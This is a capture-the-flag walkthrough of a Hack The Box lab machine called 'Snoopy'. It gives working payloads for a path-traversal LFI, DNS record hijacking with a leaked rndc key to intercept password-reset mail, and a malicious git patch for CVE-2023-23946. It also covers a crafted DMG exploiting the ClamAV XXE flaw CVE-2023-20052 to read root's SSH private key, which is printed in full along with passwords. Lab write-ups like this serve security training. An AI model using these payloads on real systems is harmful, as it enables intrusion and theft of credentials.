Snoopy

Recon

HTTP (80)

└─$ domain='snoopy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fs 0,23418
mm                      [Status: 200, Size: 3132, Words: 141, Lines: 1, Duration: 191ms]

mm is Mattermost portal, but without creds no luck.

Get users from /about.html

cschultz@snoopy.htb
sbrown@snoopy.htb
hangel@snoopy.htb
lpelt@snoopy.htb

LFI

Index page has download script http://snoopy.htb/download?file=announcement.pdf

└─$ ffuf -u 'http://snoopy.htb/download?file=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 0
       v2.1.0-dev
# Delete many variations of same payload, shortest is below
....//....//....//....//etc/passwd [Status: 200, Size: 796, Words: 3, Lines: 2, Duration: 84ms]

LFI is confirmed

└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//etc/passwd' -O
└─$ file download
download: Zip archive data, at least v2.0 to extract, compression method=deflate
└─$ unzip download
Archive:  download
  inflating: press_package/etc/passwd
└─$ grep sh$ press_package/etc/passwd
root:x:0:0:root:/root:/bin/bash
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash

The chat application allows sending Password Reset to emails, but because mail server is disabled this won't work. If we could hijack this that would be great 🤔

Application seems to be living inside the /var/www/html, but I can't read index.php 🤔

└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//etc/nginx/sites-enabled/default' -so out.zip && unzip out.zip
└─$ cat press_package/etc/nginx/sites-enabled/default | grep -vE '#|^$'
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        root /var/www/html;
        index index.html index.htm index.nginx-debian.html;
        server_name _;
        location / {
                try_files $uri $uri/ =404;
        }

        location ~ ^/download$ {
                alias /var/www/html/download.php;
                fastcgi_pass unix:/var/run/php/php8.1-fpm.sock;
                fastcgi_param SCRIPT_FILENAME $request_filename;
                include fastcgi_params;
        }

        location ~ \.php$ {
                include fastcgi_params;
                fastcgi_pass unix:/run/php/php8.1-fpm.sock;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        }
}

└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//var/www/html/download.php' -so out.zip && unzip out.zip
└─$ cat press_package/var/www/html/download.php
<?php

$file = $_GET['file'];
$dir = 'press_package/';
$archive = tempnam(sys_get_temp_dir(), 'archive');
$zip = new ZipArchive();
$zip->open($archive, ZipArchive::CREATE);

if (isset($file)) {
        $content = preg_replace('/\.\.\//', '', $file);
        $filecontent = $dir . $content;
        if (file_exists($filecontent)) {
            if ($filecontent !== '.' && $filecontent !== '..') {
                $content = preg_replace('/\.\.\//', '', $filecontent);
                $zip->addFile($filecontent, $content);
            }
        }
} else {
        $files = scandir($dir);
        foreach ($files as $file) {
                if ($file !== '.' && $file !== '..') {
                        $zip->addFile($dir . '/' . $file, $file);
                }
        }
}

$zip->close();
header('Content-Type: application/zip');
header("Content-Disposition: attachment; filename=press_release.zip");
header('Content-Length: ' . filesize($archive));

readfile($archive);
unlink($archive);

?>
└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//var/www/html/forms/contact.php' -so out.zip && unzip out.zip
Archive:  out.zip
  inflating: press_package/var/www/html/forms/contact.php

┌──(woyag㉿kraken)-[~/…/Snoopy/t/press_package/etc]
└─$ cat press_package/var/www/html/forms/contact.php
<?php
  /**
  * Requires the "PHP Email Form" library
  * The "PHP Email Form" library is available only in the pro version of the template
  * The library should be uploaded to: vendor/php-email-form/php-email-form.php
  * For more info and help: https://bootstrapmade.com/php-email-form/
  */

  // Replace contact@example.com with your real receiving email address
  $receiving_email_address = 'contact@example.com';

  if( file_exists($php_email_form = '../assets/vendor/php-email-form/php-email-form.php' )) {
    include( $php_email_form );
  } else {
    die( 'Unable to load the "PHP Email Form" Library!');
  }

  $contact = new PHP_Email_Form;
  $contact->ajax = true;

  $contact->to = $receiving_email_address;
  $contact->from_name = $_POST['name'];
  $contact->from_email = $_POST['email'];
  $contact->subject = $_POST['subject'];

  // Uncomment below code if you want to use SMTP to send emails. You need to enter your correct SMTP credentials
  /* $contact->smtp = array( 'host' => 'example.com', 'username' => 'example', 'password' => 'pass', 'port' => '587' ); */

  $contact->add_message( $_POST['name'], 'From');
  $contact->add_message( $_POST['email'], 'Email');
  $contact->add_message( $_POST['message'], 'Message', 10);

  echo $contact->send();
?>
└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//var/www/html/assets/vendor/php-email-form/php-email-form.php' -so out.zip && unzip out.zip
Archive:  out.zip
  End-of-central-directory signature not found.  Either this file is not
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
  latter case the central directory and zipfile comment will be found on
  the last disk(s) of this archive.
unzip:  cannot find zipfile directory in one of out.zip or
        out.zip.zip, and cannot find out.zip.ZIP, period.

No credentials, but it mentions that SMTP is being used. php-email-form.php doesn't exist, but if we write to it we can probably get RCE? 💭

DNS (53)

DNS is open for some reason, but ANY returned no responses. But using axfr returned more domains 📝

└─$ dig ANY snoopy.htb @10.129.229.5 | grep -vE ';|^$'
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
snoopy.htb.             86400   IN      NS      ns2.snoopy.htb.
snoopy.htb.             86400   IN      NS      ns1.snoopy.htb.
ns1.snoopy.htb.         86400   IN      A       10.0.50.10
ns2.snoopy.htb.         86400   IN      A       10.0.51.10

└─$ dig axfr snoopy.htb @10.129.229.5 | grep -vE ';|^$'
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
snoopy.htb.             86400   IN      NS      ns1.snoopy.htb.
snoopy.htb.             86400   IN      NS      ns2.snoopy.htb.
mattermost.snoopy.htb.  86400   IN      A       172.18.0.3
mm.snoopy.htb.          86400   IN      A       127.0.0.1
ns1.snoopy.htb.         86400   IN      A       10.0.50.10
ns2.snoopy.htb.         86400   IN      A       10.0.51.10
postgres.snoopy.htb.    86400   IN      A       172.18.0.2
provisions.snoopy.htb.  86400   IN      A       172.18.0.4
www.snoopy.htb.         86400   IN      A       127.0.0.1
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400

https://ubuntu.com/server/docs/domain-name-service-dns#:~:text=The%20DNS%20configuration%20files%20are,%2Fetc%2Fbind%2Fnamed.

└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//etc/bind/named.conf' -so out.zip && unzip out.zip
└─$ cat press_package/etc/bind/named.conf
// This is the primary configuration file for the BIND DNS server named.
//
// Please read /usr/share/doc/bind9/README.Debian.gz for information on the
// structure of BIND configuration files in Debian, *BEFORE* you customize
// this configuration file.
//
// If you are just adding zones, please do that in /etc/bind/named.conf.local

include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";

key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};
└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//etc/bind/named.conf.local' -so out.zip && unzip out.zip
└─$ cat press_package/etc/bind/named.conf.local
// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "snoopy.htb" IN {
    type master;
    file "/var/lib/bind/db.snoopy.htb";
    allow-update { key "rndc-key"; };
    allow-transfer { 10.0.0.0/8; };
};
└─$ curl 'http://snoopy.htb/download?file=....//....//....//....//etc/bind/zones.rfc1918' -so out.zip && unzip out.zip
└─$ cat press_package/etc/bind/zones.rfc1918
zone "10.in-addr.arpa"      { type master; file "/etc/bind/db.empty"; };
zone "16.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "17.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "18.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "19.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "20.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "21.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "22.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "23.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "24.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "25.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "26.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "27.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "28.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "29.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "30.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "31.172.in-addr.arpa"  { type master; file "/etc/bind/db.empty"; };
zone "168.192.in-addr.arpa" { type master; file "/etc/bind/db.empty"; };

SMTP

allow-transfer is interesting in configuration.

nsupdate - Dynamic DNS update utility

└─$ cat rndc.key
key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};

└─$ cat update.txt
server 10.129.229.5
zone snoopy.htb
update add mail.snoopy.htb. 3600 A 10.10.14.113
send

└─$ nsupdate -k rndc.key update.txt

└─$ dig axfr snoopy.htb @10.129.229.5 | grep mail
mail.snoopy.htb.        3600    IN      A       10.10.14.113

We get a connection, but it hangs so it must be expecting real SMTP server's answer.

└─$ echo 'EHLO' | ncat -lvnkp 25
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:25
Ncat: Listening on 0.0.0.0:25
Ncat: Connection from 10.129.229.5:39818.

Run SMTP with python built-in module on port 25:

└─$ py -m smtpd -c DebuggingServer -n 0.0.0.0:25 | tee smtp.log
...
b'Reset Your Password'
b'Click the button below to reset your password. If you didn=E2=80=99t reques='
b't this, you can safely ignore this email.'
b''
b'Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3Dj3pea='
b'4t1xe3czn7rtua699kk345aqktbbfofzwo9y3expycybew1mnjzup1ipbur )'
b''
b'The password reset link expires in 24 hours.'
...

Chat

http://mm.snoopy.htb/reset_password_complete?token=j3pea4t1xe3czn7rtua699kk345aqktbbfofzwo9y3expycybew1mnjzup1ipbur

Town Square talks about adding dedicated channel for new DevSecOps tool, if we go to Find Channel and search for subdomains found in DNS we end up on Server Provisioning

When submitting the request form we get a callback at port 2222 with Paramiko, SSH.

SSH Honeypot

Automatic

sshesame: An easy to set up and use SSH honeypot, a fake SSH server that lets anyone in and logs their activity

└─$ curl -LOs https://github.com/jaksi/sshesame/releases/download/v0.0.39/sshesame-linux-amd64
└─$ chmod +x sshesame-linux-amd64
└─$ ./sshesame-linux-amd64 -h
Usage of ./sshesame-linux-amd64:
  -config string
        optional config file
  -data_dir string
        data directory to store automatically generated host keys in (default "/home/woyag/.local/share/sshesame")

└─$ curl -LOs https://raw.githubusercontent.com/jaksi/sshesame/refs/heads/master/sshesame.yaml
└─$ head -2 sshesame.yaml
server:
  listen_address: 0.0.0.0:2222

└─$ sshesame -config sshesame.yaml -data_dir $(pwd)
INFO 2024/12/10 15:26:06 No host keys configured, using keys at "/home/woyag/Desktop/Rooms/Snoopy/honeypot"
INFO 2024/12/10 15:26:06 Host key "/home/woyag/Desktop/Rooms/Snoopy/honeypot/host_rsa_key" not found, generating it
INFO 2024/12/10 15:26:08 Host key "/home/woyag/Desktop/Rooms/Snoopy/honeypot/host_ecdsa_key" not found, generating it
INFO 2024/12/10 15:26:08 Host key "/home/woyag/Desktop/Rooms/Snoopy/honeypot/host_ed25519_key" not found, generating it
INFO 2024/12/10 15:26:08 Listening on [::]:2222
2024/12/10 15:26:15 [10.129.229.5:43852] authentication for user "cbrown" with password "sn00pedcr3dential!!!" accepted
2024/12/10 15:26:15 [10.129.229.5:43852] connection with client version "SSH-2.0-paramiko_3.1.0" established
2024/12/10 15:26:15 [10.129.229.5:43852] [channel 0] session requested
2024/12/10 15:26:15 [10.129.229.5:43852] [channel 0] command "ls -la" requested
2024/12/10 15:26:15 [10.129.229.5:43852] [channel 0] closed
2024/12/10 15:26:15 [10.129.229.5:43852] connection closed

Manual

So basically pam_exec module can be used to log usernames and input in the SSH, essentially making it a honeypot. BUT this requires usernames to exist on the system, invalid usernames are logged, but their input no.

Post Exploitation: Sniffing Logon Passwords with PAM

https://book.hacktricks.xyz/linux-hardening/linux-post-exploitation#sniffing-logon-passwords-with-pam

SSH (cbrown)

└─$ sshpass -p 'sn00pedcr3dential!!!' ssh cbrown@snoopy.htb
cbrown@snoopy:~$ id
uid=1000(cbrown) gid=1000(cbrown) groups=1000(cbrown),1002(devops)

cbrown@snoopy:~$ sudo -l
Matching Defaults entries for cbrown on snoopy:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User cbrown may run the following commands on snoopy:
    (sbrown) PASSWD: /usr/bin/git ^apply -v [a-zA-Z0-9.]+$

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-git-privilege-escalation/#git-apply

Didn't work out.

cd `mktemp -d`
ssh-keygen -f id_rsa -P x -q
cat id_rsa.pub >> ~/.ssh/authorized_keys
cd /home
git diff $USER/.bash_history $USER/.ssh/authorized_keys > /tmp/patch
sed -i "s/$USER/sbrown/g" /tmp/patch
cd /tmp
sudo -u sbrown git apply -v patch
ssh -i /home/$USER/.ssh/id_rsa sbrown@example.com

Get git version

cbrown@snoopy:/tmp$ git --version
git version 2.34.1

https://github.com/aquasecurity/trivy/issues/3458 -> https://github.blog/open-source/git/git-security-vulnerabilities-announced-2/ -> https://github.blog/open-source/git/git-security-vulnerabilities-announced-3/ -> Avoid running git apply / git am on input from untrusted sources (CVE-2023-23946).

https://cvefeed.io/vuln/detail/CVE-2023-23946 CVE-2023-23946-POC

Generate SSH keys

└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIENIiQWk/yLnuTIjmE0sZK5HEq7Sy1ouM/yGOWdecURc woyag@kraken

Create malicious patch which will write to authorized_keys and will enable us to login into SSH. (Refer to PoC)

cbrown@snoopy:/tmp$ vim exploit.patch
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/authorized_keys
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIENIiQWk/yLnuTIjmE0sZK5HEq7Sy1ouM/yGOWdecURc woyag@kraken

Create a symlink which is directory we want to write to and apply

cbrown@snoopy:/tmp$ ln -s /home/sbrown/.ssh symlink
cbrown@snoopy:/tmp$ sudo -u sbrown git apply -v exploit.patch
[sudo] password for cbrown:
Checking patch symlink => newsymlink...
Checking patch newsymlink/authorized_keys...
warning: unable to unlink 'symlink': Operation not permitted
Applied patch symlink => newsymlink cleanly.
Applied patch newsymlink/authorized_keys cleanly.

SSH (sbrown)

└─$ ssh -i id_rsa sbrown@snoopy.htb
Enter passphrase for key 'id_rsa': x
sbrown@snoopy:~$ id
uid=1001(sbrown) gid=1001(sbrown) groups=1001(sbrown),1002(devops)

User.txt

sbrown@snoopy:~$ cat user.txt
813766b7f69b05c43fe32cce7b51cc39

Privilege Escalation (root)

sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User sbrown may run the following commands on snoopy:
    (root) NOPASSWD: /usr/local/bin/clamscan ^--debug /home/sbrown/scanfiles/[a-zA-Z0-9.]+$

sbrown@snoopy:~$ clamscan --version
ClamAV 1.0.0/26853/Fri Mar 24 07:24:11 2023

CVE-2023-20052: ClamAV XXE Vulnerability CVE-2023-20052 PoC

We need to create a *.DMG file, but fuck that! I don't want to wait for docker and I don't want to install those tools.

Download something like 7zip.DMG

└─$ strings NotepadNext-v0.9.dmg | grep -A100 '<?xml'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
        <key>resource-fork</key>
        <dict>
                <key>blkx</key>
                <array>
                        <dict>
                                <key>Attributes</key>
                                <string>0x0050</string>
                                <key>CFName</key>
                                <string>Protective Master Boot Record (MBR : 0)</string>
                                <key>Data</key>
                                <data> ... </data>
                                <key>ID</key>
                                <string>-1</string>
                                <key>Name</key>
                                <string>Protective Master Boot Record (MBR : 0)</string>
                        </dict>

We need to replace with:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<plist version="1.0">
<dict>
        <key>resource-fork</key>
        <dict>
                <key>&xxe;</key>

└─$ vim -c "syntax off | set lazyredraw" NotepadNext-v0.9.dmg
Shift+G -> Jump down
Shift+UpArrow -> Jump Page
...Go to `<!DOCTYPE`
DD -> Delete Line
...Copy the xxe above
PP -> Paste Line
Relace `blkx` with `&xxe;`
:wq! -> Write and Quit

└─$ scp -i id_rsa NotepadNext-v0.9.dmg sbrown@snoopy.htb:/home/sbrown/scanfiles/exploit.dmg
---
sudo /usr/local/bin/clamscan --debug /home/sbrown/scanfiles/exploit.dmg

Nothing 🤔

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
---
<!DOCTYPE plist [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

💀 the hardest fucking part was finding valid DMG files......... This took way too long..... Should have just used fucking Docker and have been done with it.

Valid DMG: https://www.macintoshrepository.org/32918-7zx-7-zip-for-mac-os-x-

└─$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xx SYSTEM "file:///etc/passwd">]>|' -e 's/blkx/&xx\;/' -e 's/plst/&xx\;/' ./7zx_171.dmg -o exploit.dmg
└─$ scp -i id_rsa ./exploit.dmg sbrown@snoopy.htb:/home/sbrown/scanfiles/exploit.dmg
---
sbrown@snoopy:~/scanfiles$ sudo /usr/local/bin/clamscan --debug /home/sbrown/scanfiles/exploit.dmg 2>&1 | tee debug.log
sbrown@snoopy:~/scanfiles$ grep sh$ debug.log
LibClamAV debug: cli_scandmg: wanted blkx, text value is root:x:0:0:root:/root:/bin/bash
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash
LibClamAV debug: cli_scandmg: wanted blkx, text value is root:x:0:0:root:/root:/bin/bash
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash

Get SSH key:

└─$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xx SYSTEM "file:///root/.ssh/id_rsa">]>|' -e 's/blkx/&xx\;/' -e 's/plst/&xx\;/' ./7zx_171.dmg -o exploit.dmg
└─$ scp -i id_rsa ./exploit.dmg sbrown@snoopy.htb:/home/sbrown/scanfiles/exploit.dmg
---
sbrown@snoopy:~/scanfiles$ sudo /usr/local/bin/clamscan --debug /home/sbrown/scanfiles/exploit.dmg 2>&1 | tee debug.log
sbrown@snoopy:~/scanfiles$ sed -n '/-----BEGIN OPENSSH PRIVATE KEY-----/,/-----END OPENSSH PRIVATE KEY-----/p'  debug.log
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

└─$ vi root.id_rsa
└─$ chmod 600 root.id_rsa
root@snoopy:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@snoopy:~# cat /root/root.txt
166a360956947e10501cb2143f711ce4

PreviousPC NextSocket

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagLFI

hashtagDNS (53)

hashtagSMTP

hashtagChat

hashtagSSH Honeypot

hashtagAutomatic

hashtagManual

hashtagSSH (cbrown)

hashtagSSH (sbrown)

hashtagUser.txt

hashtagPrivilege Escalation (root)

hashtagRoot.txt